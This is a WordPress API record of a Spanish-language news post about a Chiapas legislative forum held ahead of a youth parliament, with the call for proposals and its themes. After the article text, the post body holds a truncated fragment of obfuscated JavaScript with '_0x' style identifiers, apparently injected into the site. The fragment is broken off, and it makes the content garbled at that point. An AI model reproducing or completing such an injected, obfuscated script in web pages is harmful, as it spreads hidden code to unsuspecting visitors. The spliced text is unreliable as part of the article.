{"id":8719,"date":"2023-02-16T03:15:41","date_gmt":"2023-02-16T03:15:41","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8719"},"modified":"2023-02-16T03:15:42","modified_gmt":"2023-02-16T03:15:42","slug":"diputados-y-el-instituto-de-la-juventud-realizan-foro-previo-al-decimo-parlamento-juvenil","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8719","title":{"rendered":"Diputados y el Instituto de la Juventud realizan foro previo al D\u00e9cimo Parlamento Juvenil"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"575\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/IMG-20230215-WA0062.jpg\" alt=\"\" class=\"wp-image-8720\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/IMG-20230215-WA0062.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/IMG-20230215-WA0062-300x168.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/IMG-20230215-WA0062-768x431.jpg 768w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Tuxtla Guti\u00e9rrez, Chiapas; 15 de febrero de 2023.-En el marco del d\u00e9cimo tercer parlamento juvenil \u201cRompiendo paradigmas\u201d, que organiza la Comisi\u00f3n de la Juventud y del Deporte, encabezado por el diputado Cuauht\u00e9moc Hern\u00e1ndez G\u00f3mez, se llev\u00f3 a cabo el foro con parlamentarios.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>     El diputado Hern\u00e1ndez G\u00f3mez calific\u00f3 a la libertad de expresi\u00f3n como un derecho humano, por eso mismo se ha motivado a la juventud de Chiapas para participar, que se escuche la voz de todos los que estar\u00e1n como diputados por un d\u00eda, para que los ciudadanos tenga beneficios a futuro.\n\n     La directora del Instituto de la Juventud del Estado de Chiapas, Getseman\u00ed Moreno Mart\u00ednez, mencion\u00f3 que hay varios rubros que se plasman para as\u00ed los que sean seleccionados, puedan presentarlo en tribuna y con ello ser retomados por los legisladores para el bienestar ciudadano.\n\n     Los ex parlamentarios participantes que expusieron su sentir y que los motiv\u00f3 a participar, fueron Luz Mar\u00eda Castillo Moreno, Gustavo Andr\u00e9s Sol\u00eds Novillo, Erika Yadhira L\u00f3pez Hern\u00e1ndez, Jes\u00fas Francisco Ru\u00edz Salgado, Luisa Guadalupe Montoya Rodr\u00edguez, Gabriel Alejandro Ballinas Salazar, parlamentarios desde 2017 al 2022.<\/code><\/pre>\n\n\n\n<p>La convocatoria se abri\u00f3 el pasado 8 de febrero y se cierra al 8 de marzo de este 2023, enviando propuestas al correo institucional: parlamentojuventudchiapas@gmail.com, cada participante solo podr\u00e1 enviar una propuesta y no se permitir\u00e1 que se env\u00ede por grupo ni quienes ya hayan participado en otros parlamentos.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>      Los temas a desarrollar son en Derechos Humanos, Trabajo y Previsi\u00f3n Social, Atenci\u00f3n a Grupos Vulnerables, Pueblos y Comunidades Ind\u00edgenas, Juventud y Deporte, Ecolog\u00eda y Cambio Clim\u00e1tico, Equidad y G\u00e9nero, Promoci\u00f3n Comercial y Fomento a la inversi\u00f3n, Ciencia y Tecnolog\u00eda.<\/code><\/pre>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Tuxtla Guti\u00e9rrez, Chiapas; 15 de febrero de 2023.-En el marco del d\u00e9cimo tercer parlamento juvenil \u201cRompiendo paradigmas\u201d, que organiza la Comisi\u00f3n de la Juventud y del Deporte, encabezado por el diputado Cuauht\u00e9moc Hern\u00e1ndez G\u00f3mez, se llev\u00f3 a cabo el foro con parlamentarios. El diputado Hern\u00e1ndez G\u00f3mez calific\u00f3 a la libertad de expresi\u00f3n como un derecho &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8720,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-8719","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8719","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8719"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8719\/revisions"}],"predecessor-version":[{"id":8721,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8719\/revisions\/8721"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8720"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8719"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8719"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8719"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}